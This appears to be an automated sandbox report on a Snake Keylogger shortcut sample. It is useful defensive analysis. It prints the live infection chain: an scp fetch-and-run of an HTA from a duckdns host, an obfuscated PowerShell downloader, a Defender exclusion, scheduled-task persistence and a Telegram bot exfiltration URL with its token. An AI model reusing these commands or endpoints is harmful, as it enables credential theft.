Analysis
max time kernel: 143s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-10-2023 09:57

Static task: static1
Behavioral task: behavioral1
  Sample: QP0990001.lnk
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: QP0990001.lnk
  Resource: win10v2004-20230915-en
General
Target: QP0990001.lnk
Size: 2KB
MD5: c23a4b2e392af2535198428aafcbc7a4
SHA1: 02a472fb5f6be33044c51420b6fa98fe3adf6251
SHA256: 81b9e6ecd9d94421b7bef50c53e109e15927b3fdfb5068f51a742b662a7deaad
SHA512: 17172ade2ef629d2b878635015a6bcbc73464737b51fc7312b1b6ffc76ea238a568bae3f479c8e2f5ef775404681d731c8217cdb6249fad8a5db98902ea00747
Malware Config
Extracted family: snakekeylogger
Exfiltration URL: https://api.telegram.org/bot6678785785:AAE948y1Spb4BUdVN86G6De5C3QmbuoXvWc/sendMessage?chat_id=6445748530
Signatures

Snake Keylogger
  Keylogger and Infostealer first seen in November 2020.

Snake Keylogger payload (2 IoCs)
  Processes:
    resource: behavioral2/memory/812-76-0x0000000000400000-0x0000000000424000-memory.dmp  yara_rule: family_snakekeylogger
    resource: behavioral2/memory/812-109-0x0000000005520000-0x0000000005530000-memory.dmp  yara_rule: family_snakekeylogger

Blocklisted process makes network request (1 IoCs)
  Processes: powershell.exe
    flow: 48  pid: 4512  process: powershell.exe

Downloads MZ/PE file
Checks computer location settings (2 TTPs, 4 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: cmd.exe, cmd.exe, mshta.exe, n1vphgdozXo9m5v.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation  cmd.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation  cmd.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation  mshta.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation  n1vphgdozXo9m5v.exe

Executes dropped EXE (2 IoCs)
  Processes: n1vphgdozXo9m5v.exe, n1vphgdozXo9m5v.exe
    pid: 3896  process: n1vphgdozXo9m5v.exe
    pid: 812   process: n1vphgdozXo9m5v.exe
Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  Processes: n1vphgdozXo9m5v.exe
    Key opened  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  n1vphgdozXo9m5v.exe
    Key opened  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  n1vphgdozXo9m5v.exe
    Key opened  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  n1vphgdozXo9m5v.exe

Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow: 145  ioc: checkip.dyndns.org
Suspicious use of SetThreadContext (1 IoCs)
  Processes: n1vphgdozXo9m5v.exe
    PID 3896 (n1vphgdozXo9m5v.exe) set thread context of 812 (n1vphgdozXo9m5v.exe)

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry class (1 IoCs)
  Processes: cmd.exe
    Key created  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings  cmd.exe
Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes: powershell.exe, powershell.exe, n1vphgdozXo9m5v.exe
    pid: 4512  process: powershell.exe
    pid: 4512  process: powershell.exe
    pid: 4512  process: powershell.exe
    pid: 4788  process: powershell.exe
    pid: 4788  process: powershell.exe
    pid: 4788  process: powershell.exe
    pid: 812   process: n1vphgdozXo9m5v.exe
    pid: 812   process: n1vphgdozXo9m5v.exe
    pid: 812   process: n1vphgdozXo9m5v.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, powershell.exe, n1vphgdozXo9m5v.exe, svchost.exe
    Token: SeDebugPrivilege         pid: 4512  process: powershell.exe
    Token: SeDebugPrivilege         pid: 4788  process: powershell.exe
    Token: SeDebugPrivilege         pid: 812   process: n1vphgdozXo9m5v.exe
    Token: SeManageVolumePrivilege  pid: 1388  process: svchost.exe
Suspicious use of WriteProcessMemory (29 IoCs)
  Processes: cmd.exe, cmd.exe, scp.exe, mshta.exe, powershell.exe, n1vphgdozXo9m5v.exe
    PID 4224 (cmd.exe) wrote to memory of 5052 (cmd.exe)
    PID 4224 (cmd.exe) wrote to memory of 5052 (cmd.exe)
    PID 5052 (cmd.exe) wrote to memory of 4904 (scp.exe)
    PID 5052 (cmd.exe) wrote to memory of 4904 (scp.exe)
    PID 4904 (scp.exe) wrote to memory of 1884 (ssh.exe)
    PID 4904 (scp.exe) wrote to memory of 1884 (ssh.exe)
    PID 5052 (cmd.exe) wrote to memory of 2236 (mshta.exe)
    PID 5052 (cmd.exe) wrote to memory of 2236 (mshta.exe)
    PID 5052 (cmd.exe) wrote to memory of 2236 (mshta.exe)
    PID 2236 (mshta.exe) wrote to memory of 4512 (powershell.exe)
    PID 2236 (mshta.exe) wrote to memory of 4512 (powershell.exe)
    PID 2236 (mshta.exe) wrote to memory of 4512 (powershell.exe)
    PID 4512 (powershell.exe) wrote to memory of 3896 (n1vphgdozXo9m5v.exe)
    PID 4512 (powershell.exe) wrote to memory of 3896 (n1vphgdozXo9m5v.exe)
    PID 4512 (powershell.exe) wrote to memory of 3896 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 4788 (powershell.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 4788 (powershell.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 4788 (powershell.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 1892 (schtasks.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 1892 (schtasks.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 1892 (schtasks.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
    PID 3896 (n1vphgdozXo9m5v.exe) wrote to memory of 812 (n1vphgdozXo9m5v.exe)
outlook_office_path (1 IoCs)
  Processes: n1vphgdozXo9m5v.exe
    Key opened  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  n1vphgdozXo9m5v.exe

outlook_win_path (1 IoCs)
  Processes: n1vphgdozXo9m5v.exe
    Key opened  \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  n1vphgdozXo9m5v.exe
Processes
(indentation shows the parent/child depth of each process in the tree)

[1] C:\Windows\system32\cmd.exe  (PID 4224)
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\QP0990001.lnk
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe  (PID 5052)
        Command line: "C:\Windows\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta
        - Checks computer location settings
        - Modifies registry class
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\OpenSSH\scp.exe  (PID 4904)
            Command line: scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\System32\OpenSSH\ssh.exe  (PID 1884)
                Command line: "C:\Windows\System32\OpenSSH\ssh.exe" -x -oForwardAgent=no -oPermitLocalCommand=no -oClearAllForwardings=yes -oRemoteCommand=none -oRequestTTY=no -o StrictHostKeyChecking=no -l aa -- hta4lyfeohyea.duckdns.org "scp -f /aa/DZZ"

        [3] C:\Windows\SysWOW64\mshta.exe  (PID 2236)
            Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\eeMT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4512)
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mVisUpqit($j, $Xl){[IO.File]::WriteAllBytes($j, $Xl)};function YAnYyojob($j){if($j.EndsWith((vNhoq @(53343,53397,53405,53405))) -eq $True){Start-Process (vNhoq @(53411,53414,53407,53397,53405,53405,53348,53347,53343,53398,53417,53398)) $j}else{Start-Process $j}};function wxsxZbvJk($w){$de = New-Object (vNhoq @(53375,53398,53413,53343,53384,53398,53395,53364,53405,53402,53398,53407,53413));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Xl = $de.DownloadData($w);return $Xl};function vNhoq($aw){$fl=53297;$m=$Null;foreach($b in $aw){$m+=[char]($b-$fl)};return $m};function ajEwZvwJ(){$TaaVVi = $env:APPDATA + '\';$xyRHLrvhS = wxsxZbvJk (vNhoq @(53329,53401,53413,53413,53409,53355,53344,53344,53346,53352,53354,53343,53349,53348,53343,53346,53352,53351,53343,53349,53347,53344,53404,53414,53396,53402,53344,53407,53346,53415,53409,53401,53400,53397,53408,53419,53385,53408,53354,53406,53350,53415,53343,53398,53417,53398));$FfTiWLO = $TaaVVi + 'n1vphgdozXo9m5v.exe';mVisUpqit $FfTiWLO $xyRHLrvhS;YAnYyojob $FfTiWLO;;;;}ajEwZvwJ;
                - Blocklisted process makes network request
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory

                [5] C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe  (PID 3896)
                    Command line: "C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"
                    - Checks computer location settings
                    - Executes dropped EXE
                    - Suspicious use of SetThreadContext
                    - Suspicious use of WriteProcessMemory

                    [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4788)
                        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\XTAxVe.exe"
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken

                    [6] C:\Windows\SysWOW64\schtasks.exe  (PID 1892)
                        Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XTAxVe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp42E0.tmp"
                        - Creates scheduled task(s)

                    [6] C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe  (PID 812)
                        Command line: "C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"
                        - Executes dropped EXE
                        - Accesses Microsoft Outlook profiles
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken
                        - outlook_office_path
                        - outlook_win_path

[1] C:\Windows\system32\rundll32.exe  (PID 3888)
    Command line: "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

[1] C:\Windows\System32\svchost.exe  (PID 1388)
    Command line: C:\Windows\System32\svchost.exe -k UnistackSvcGroup
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads